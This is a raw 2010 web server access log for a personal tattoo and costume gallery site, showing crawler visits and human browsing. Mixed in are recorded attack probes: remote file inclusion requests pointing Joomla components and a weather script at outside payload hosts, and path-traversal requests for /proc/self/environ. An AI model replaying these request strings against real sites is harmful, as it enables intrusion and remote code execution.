69.90.47.83 - - [23/May/2010:20:35:47 -0500] "GET /logs/access_log.1273363200//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 386 "-""libwww-perl/5.805"
69.90.47.83 - - [23/May/2010:20:35:47 -0500] "GET //component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
69.90.47.83 - - [23/May/2010:20:35:47 -0500] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:20:37:21 -0500] "GET /logs/access_log.1243987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.90.47.83 - - [23/May/2010:20:37:36 -0500] "GET /logs/access_log.1273017600//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 386 "-""libwww-perl/5.805"
121.88.4.141 - - [23/May/2010:20:37:57 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [23/May/2010:20:37:58 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [23/May/2010:20:37:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.13.93 - - [23/May/2010:20:39:32 -0500] "GET /logs/access_log.1194480000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.86 - - [23/May/2010:20:40:02 -0500] "GET /logs/access_log.1260662400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:20:41:51 -0500] "GET /logs/access_log.1176336000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:20:43:24 -0500] "GET /logs/access_log.1201132800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:20:45:57 -0500] "GET /logs/access_log.1182124800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET /logs/access_log.1273017600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:46:30 -0500] "GET /logs/access_log.1273017600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:20:48:29 -0500] "GET /logs/access_log.1170806400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
218.149.84.14 - - [23/May/2010:20:49:05 -0500] "GET /logs/access_log.1264032000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:49:05 -0500] "GET /logs/access_log.1272585600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:49:06 -0500] "GET /logs/access_log.1264032000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:20:49:06 -0500] "GET /logs/access_log.1272585600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:20:51:25 -0500] "GET /logs/access_log.1172707200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.200 - - [23/May/2010:20:55:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.219.127.4 - - [23/May/2010:20:56:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Falconsbot; +http://ws.nju.edu.cn/falcons/)"
219.219.127.4 - - [23/May/2010:20:56:05 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Falconsbot; +http://ws.nju.edu.cn/falcons/)"
87.250.255.243 - - [23/May/2010:20:56:29 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.45.109.10 - - [23/May/2010:20:57:26 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
173.45.109.10 - - [23/May/2010:20:57:26 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
121.88.4.141 - - [23/May/2010:20:57:49 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.250.255.243 - - [23/May/2010:20:59:20 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.243 - - [23/May/2010:20:59:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.243 - - [23/May/2010:20:59:32 -0500] "GET /logs/access_log.1204675200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.53 - - [23/May/2010:21:02:32 -0500] "GET /logs/access_log.1186963200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
24.4.58.91 - - [23/May/2010:21:03:59 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=9&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26tbs%3Disch:1""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:00 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:00 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:00 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:00 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:00 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:17 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
24.4.58.91 - - [23/May/2010:21:04:18 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
87.250.255.243 - - [23/May/2010:21:04:24 -0500] "GET /logs/access_log.1174521600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
95.211.18.156 - - [23/May/2010:21:06:11 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
95.211.18.156 - - [23/May/2010:21:06:11 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:21:06:52 -0500] "GET /logs/access_log.1251936000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.129.167.25 - - [23/May/2010:21:07:22 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:07:22 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:07:22 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.89.55.2 - - [23/May/2010:21:07:26 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.167.25 - - [23/May/2010:21:07:36 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:07:36 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:07:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.204.244 - - [23/May/2010:21:08:32 -0500] "GET /logs/access_log.1219276800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:21:09:27 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.129.167.25 - - [23/May/2010:21:09:36 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:09:40 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:09:42 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:10:01 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:10:02 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:21:10:02 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:21:12:02 -0500] "GET /logs/access_log.1206921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:21:14:30 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
123.243.67.208 - - [23/May/2010:21:16:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:16:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:16:36 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:16:37 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:16:37 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:16:37 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:19 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:24 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:25 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:25 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:26 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:27 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:27 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:27 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
87.250.255.243 - - [23/May/2010:21:17:47 -0500] "GET /tattoo/set1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
123.243.67.208 - - [23/May/2010:21:17:56 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:57 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:58 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:59 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:17:59 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:18:14 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
123.243.67.208 - - [23/May/2010:21:18:15 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 200 46929 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
